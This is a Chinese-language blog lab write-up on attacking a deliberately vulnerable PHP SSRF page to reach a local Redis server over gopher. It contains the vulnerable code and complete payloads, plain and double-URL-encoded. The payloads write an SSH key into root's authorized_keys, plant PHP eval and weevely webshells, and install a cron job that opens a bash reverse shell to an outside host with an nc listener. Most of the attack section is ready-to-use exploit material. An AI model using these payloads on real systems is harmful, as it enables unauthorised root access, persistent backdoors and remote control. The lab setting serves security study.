ssrf+redis

澤N煜發表於2020-11-30
Redis

ssrf+redis

  • 實驗環境
    靶機:ubuntu16.04 ip:192.168.211.130
    在靶機中搭建lamp環境、安裝redis、安裝ssh
    攻擊機:kali2020 ip:192.168.211.134
    在攻擊機中安裝redis
    vps:windows10(本機) ip:10.133.164.81
    在windows中安裝cn.exe

  • 實驗步驟
    1.將ssrf.php檔案放在web根目錄下
    ssrf.php:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch);
curl_close($ch);
?>

2.通過攻擊機訪問靶機的ssrf.php,確定可以訪問的通
http://192.168.211.130/ssrf.php?url=www.baidu.com
在這裡插入圖片描述3.靶機中,進入redis安裝目錄,開啟redis服務

redis-server redis.conf

攻擊機中,進入redis安裝目錄,開啟redis服務

redis-server redis.conf

4.在攻擊機中測試

redis-cli -h 192.168.211.130

在這裡插入圖片描述
連線成功即兩個redis可以互通
輸入quit或exit退出
5.在瀏覽器中訪問http://192.168.211.130/ssrf.php?url=127.0.0.1,出現如下圖,可以判定存在ssrf漏洞
在這裡插入圖片描述6.在瀏覽器中訪問
http://192.168.211.130/ssrf.php?url=dict://127.0.0.1:6379/info,進行redis的預設埠6379進行訪問,如下圖,可以發現靶機上的redis服務
在這裡插入圖片描述ssrf+redis攻擊
7.在靶機上使用root許可權新建一個
公鑰存放目錄.ssh

mkdir /root/.ssh

8.在攻擊機中使用root許可權新建一個
公鑰存放目錄.ssh

mkdir /root/.ssh

進入公鑰存放目錄,使用如下命令,生成ssh公鑰和私鑰:
在這裡我金鑰密碼均設為空(也可以設為別的)

cd /root/.ssh
ssh-keygen -t rsa

在這裡插入圖片描述
9.將公鑰提取出來到ceshi.txt中,cat ceshi.txt檢視公鑰

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") >ceshi.txt
cat ceshi.txt

在這裡插入圖片描述
在這裡插入圖片描述8.通過URL訪問SSRF漏洞地址:http://10.1.8.159/ssrf.php?url=
結合gother協議構造符合格式的paylod,從而模擬redis通訊。
正常是在redis客戶端和服務端連線通訊時,payload如下:

set  margin  "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDr6sOA325MhcQUUknax18ZY9+I/t8LUzPqaD1eX/covADk/nbqcdohGhziCqNIicwdsSoSGu94Y1sauZfocDIIxsfvacFERhmjOXuO2MwxwBRjhblaMUnf3z/pWHjGC03olnkC7JzCIxydkoWRjuEZSbjYSvFvW70P0phyjQ6uYeBXZ32WWEB3iBDW7RGUI/UqmTYr5dWVnzbPsebNqVlCbfvBCGAGC3BmmZs2xoD8gFltru4BraBhMc3a5KCJrpuHVkC+5HxrzpTkFUIxIF2MgdC4XEtFgJUPyXE9kL94/Y/xgVtxFzeyYURPyN0PsLSgyJopIkSTQh/+/u+46MlXWZb+8LjdafSy9vglbiCir7u9rQGB8eqo8iBzfSZpDmJi0GqFJioWs5yF0guw06OEoC52cf8q2568zsdp8B4VBW1cSTPTaAdv9aEbn6qANLjigSIFMApW3eU5jEECawXts9Z7v9CfKd2Z3rHuIV4pl85emdv51fXyPiV1wf0m2zs= root@kali\n\n\n"
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save

將gother後面非字元內容進行URL編碼

http://192.168.211.130/ssrf.php?url=gother://127.0.0.1:6379/_payload
轉換為:
http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_payload

將以上命令構造成符合gother協議格式,且能夠通過URL傳輸的格式來傳送
將正常的payload進行兩次URL編碼構成新的payload
在這裡插入圖片描述完整的訪問網址

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%32%30%25%36%64%25%36%31%25%37%32%25%36%37%25%36%39%25%36%65%25%32%30%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%37%33%25%37%33%25%36%38%25%32%64%25%37%32%25%37%33%25%36%31%25%32%30%25%34%31%25%34%31%25%34%31%25%34%31%25%34%32%25%33%33%25%34%65%25%37%61%25%36%31%25%34%33%25%33%31%25%37%39%25%36%33%25%33%32%25%34%35%25%34%31%25%34%31%25%34%31%25%34%31%25%34%34%25%34%31%25%35%31%25%34%31%25%34%32%25%34%31%25%34%31%25%34%31%25%34%32%25%36%37%25%35%31%25%34%34%25%37%32%25%33%36%25%37%33%25%34%66%25%34%31%25%33%33%25%33%32%25%33%35%25%34%64%25%36%38%25%36%33%25%35%31%25%35%35%25%35%35%25%36%62%25%36%65%25%36%31%25%37%38%25%33%31%25%33%38%25%35%61%25%35%39%25%33%39%25%32%62%25%34%39%25%32%66%25%37%34%25%33%38%25%34%63%25%35%35%25%37%61%25%35%30%25%37%31%25%36%31%25%34%34%25%33%31%25%36%35%25%35%38%25%32%66%25%36%33%25%36%66%25%37%36%25%34%31%25%34%34%25%36%62%25%32%66%25%36%65%25%36%32%25%37%31%25%36%33%25%36%34%25%36%66%25%36%38%25%34%37%25%36%38%25%37%61%25%36%39%25%34%33%25%37%31%25%34%65%25%34%39%25%36%39%25%36%33%25%37%37%25%36%34%25%37%33%25%35%33%25%36%66%25%35%33%25%34%37%25%37%35%25%33%39%25%33%34%25%35%39%25%33%31%25%37%33%25%36%31%25%37%35%25%35%61%25%36%36%25%36%66%25%36%33%25%34%34%25%34%39%25%34%39%25%37%38%25%37%33%25%36%36%25%37%36%25%36%31%25%36%33%25%34%36%25%34%35%25%35%32%25%36%38%25%36%64%25%36%61%25%34%66%25%35%38%25%37%35%25%34%66%25%33%32%25%34%64%25%37%37%25%37%38%25%37%37%25%34%32%25%35%32%25%36%61%25%36%38%25%36%32%25%36%63%25%36%31%25%34%64%25%35%35%25%36%65%25%36%36%25%33%33%25%37%61%25%32%66%25%37%30%25%35%37%25%34%38%25%36%61%25%34%37%25%34%33%25%33%30%25%33%33%25%36%66%25%36%63%25%36%65%25%36%62%25%34%33%25%33%37%25%34%61%25%37%61%25%34%33%25%34%39%25%37%38%25%37%39%25%36%34%25%36%62%25%36%66%25%35%37%25%35%32%25%36%61%25%37%35%25%34%35%25%35%61%25%35%33%25%36%32%25%36%61%25%35%39%25%35%33%25%37%36%25%34%36%25%37%36%25%35%37%25%33%37%25%33%30%25%35%30%25%33%30%25%37%30%25%36%38%25%37%39%25%36%61%25%35%31%25%33%36%25%37%35%25%35%39%25%36%35%25%34%32%25%35%38%25%35%61%25%33%33%25%33%32%25%35%37%25%35%37%25%34%35%25%34%32%25%33%33%25%36%39%25%34%32%25%34%34%25%35%37%25%33%37%25%35%32%25%34%37%25%35%35%25%34%39%25%32%66%25%35%35%25%37%31%25%36%64%25%35%34%25%35%39%25%37%32%25%33%35%25%36%34%25%35%37%25%35%36%25%36%65%25%37%61%25%36%32%25%35%30%25%37%33%25%36%35%25%36%32%25%34%65%25%37%31%25%35%36%25%36%63%25%34%33%25%36%32%25%36%36%25%37%36%25%34%32%25%34%33%25%34%37%25%34%31%25%34%37%25%34%33%25%33%33%25%34%32%25%36%64%25%36%64%25%35%61%25%37%33%25%33%32%25%37%38%25%36%66%25%34%34%25%33%38%25%36%37%25%34%36%25%36%63%25%37%34%25%37%32%25%37%35%25%33%34%25%34%32%25%37%32%25%36%31%25%34%32%25%36%38%25%34%64%25%36%33%25%33%33%25%36%31%25%33%35%25%34%62%25%34%33%25%34%61%25%37%32%25%37%30%25%37%35%25%34%38%25%35%36%25%36%62%25%34%33%25%32%62%25%33%35%25%34%38%25%37%38%25%37%32%25%37%61%25%37%30%25%35%34%25%36%62%25%34%36%25%35%35%25%34%39%25%37%38%25%34%39%25%34%36%25%33%32%25%34%64%25%36%37%25%36%34%25%34%33%25%33%34%25%35%38%25%34%35%25%37%34%25%34%36%25%36%37%25%34%61%25%35%35%25%35%30%25%37%39%25%35%38%25%34%35%25%33%39%25%36%62%25%34%63%25%33%39%25%33%34%25%32%66%25%35%39%25%32%66%25%37%38%25%36%37%25%35%36%25%37%34%25%37%38%25%34%36%25%37%61%25%36%35%25%37%39%25%35%39%25%35%35%25%35%32%25%35%30%25%37%39%25%34%65%25%33%30%25%35%30%25%37%33%25%34%63%25%35%33%25%36%37%25%37%39%25%34%61%25%36%66%25%37%30%25%34%39%25%36%62%25%35%33%25%35%34%25%35%31%25%36%38%25%32%66%25%32%62%25%32%66%25%37%35%25%32%62%25%33%34%25%33%36%25%34%64%25%36%63%25%35%38%25%35%37%25%35%61%25%36%32%25%32%62%25%33%38%25%34%63%25%36%61%25%36%34%25%36%31%25%36%36%25%35%33%25%37%39%25%33%39%25%37%36%25%36%37%25%36%63%25%36%32%25%36%39%25%34%33%25%36%39%25%37%32%25%33%37%25%37%35%25%33%39%25%37%32%25%35%31%25%34%37%25%34%32%25%33%38%25%36%35%25%37%31%25%36%66%25%33%38%25%36%39%25%34%32%25%37%61%25%36%36%25%35%33%25%35%61%25%37%30%25%34%34%25%36%64%25%34%61%25%36%39%25%33%30%25%34%37%25%37%31%25%34%36%25%34%61%25%36%39%25%36%66%25%35%37%25%37%33%25%33%35%25%37%39%25%34%36%25%33%30%25%36%37%25%37%35%25%37%37%25%33%30%25%33%36%25%34%66%25%34%35%25%36%66%25%34%33%25%33%35%25%33%32%25%36%33%25%36%36%25%33%38%25%37%31%25%33%32%25%33%35%25%33%36%25%33%38%25%37%61%25%37%33%25%36%34%25%37%30%25%33%38%25%34%32%25%33%34%25%35%36%25%34%32%25%35%37%25%33%31%25%36%33%25%35%33%25%35%34%25%35%30%25%35%34%25%36%31%25%34%31%25%36%34%25%37%36%25%33%39%25%36%31%25%34%35%25%36%32%25%36%65%25%33%36%25%37%31%25%34%31%25%34%65%25%34%63%25%36%61%25%36%39%25%36%37%25%35%33%25%34%39%25%34%36%25%34%64%25%34%31%25%37%30%25%35%37%25%33%33%25%36%35%25%35%35%25%33%35%25%36%61%25%34%35%25%34%35%25%34%33%25%36%31%25%37%37%25%35%38%25%37%34%25%37%33%25%33%39%25%35%61%25%33%37%25%37%36%25%33%39%25%34%33%25%36%36%25%34%62%25%36%34%25%33%32%25%35%61%25%33%33%25%37%32%25%34%38%25%37%35%25%34%39%25%35%36%25%33%34%25%37%30%25%36%63%25%33%38%25%33%35%25%36%35%25%36%64%25%36%34%25%37%36%25%33%35%25%33%31%25%36%36%25%35%38%25%37%39%25%35%30%25%36%39%25%35%36%25%33%31%25%37%37%25%36%36%25%33%30%25%36%64%25%33%32%25%37%61%25%37%33%25%33%64%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%34%30%25%36%62%25%36%31%25%36%63%25%36%39%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%32%25%36%66%25%36%66%25%37%34%25%32%66%25%32%65%25%37%33%25%37%33%25%36%38%25%32%66%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%32%32%25%36%31%25%37%35%25%37%34%25%36%38%25%36%66%25%37%32%25%36%39%25%37%61%25%36%35%25%36%34%25%35%66%25%36%62%25%36%35%25%37%39%25%37%33%25%32%32%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

9.直接在瀏覽器中訪問
或者在攻擊中執行命令

curl  完整網址

頁面會顯示超時,但還是吧公鑰傳入了.ssh中
在這裡插入圖片描述
這裡由於我等待的時間比較長,就直接將公鑰放入了.ssh中
在這裡插入圖片描述
10.在靶機中,開啟ssh服務

systemctl restart sshd.service

在攻擊機上使用ssh登陸靶機

ssh -i id_rsa root@192.168.211.130

在這裡插入圖片描述但是這裡沒有免密登陸,我想應該是由於公鑰是我複製過去的,而不是傳過去的吧
但是最終也能登陸
輸入ifconfig,可以檢視到靶機的ip
在這裡插入圖片描述向web中寫入webshell
11.同理,將上面訪問的網址的payload重新構造
原本的payload(即將一句話木馬放入靶機的web根目錄下):

set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n"
config set dir /var/www/html  
config set dbfilename shell.php
save

完整的訪問網址:

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

這裡,我直接通過kali(攻擊機)的菜刀(weevely),生成一個1.php檔案作為webshell
在kali中輸入生成webshell,密碼為password

weevely generate password /root/Desktop/1.php

如下圖所示即夠造完成
在這裡插入圖片描述cat 1.php得到1.php內容
在這裡插入圖片描述

與上面構造payload一樣
將這個webshell傳入網站根目錄
payload:

set x "\n\n\n這裡為1.php的內容\n\n\n"
config set dir /var/www/html  
config set dbfilename 1.php
save

在進行兩次URL編碼形成完整的訪問連線傳入

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_這裡為兩次url編碼後的內容

這裡我直接將檔案移動到靶機網站的根目錄下
在這裡插入圖片描述
12.在攻擊機中通過菜刀進行訪問

weevely http://192.168.211.130/1.php password

在這裡插入圖片描述輸入dir檢視根目錄下檔案,輸入quit退出
有興趣,也可以嘗試上面的一句話木馬,密碼自己破解一下
計劃反彈shell
13.windows 在nc安裝目錄下執行./nc.exe -lvp 6666 ,對6666埠進行監聽

./nc.exe -lvp 6666

在這裡插入圖片描述

14.構造payload
正常的payload:

set xxx "\n\n* * * * * bash -i>& /dev/tcp/10.133.164.81/6666 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

兩次url編碼後完整的訪問網址

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%30%25%32%65%25%33%31%25%33%33%25%33%33%25%32%65%25%33%31%25%33%36%25%33%34%25%32%65%25%33%38%25%33%31%25%32%66%25%33%36%25%33%36%25%33%36%25%33%36%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

通過攻擊機進行訪問該網址,在Windows中進行監聽,當監聽到時,靶機中將會出現反彈的shell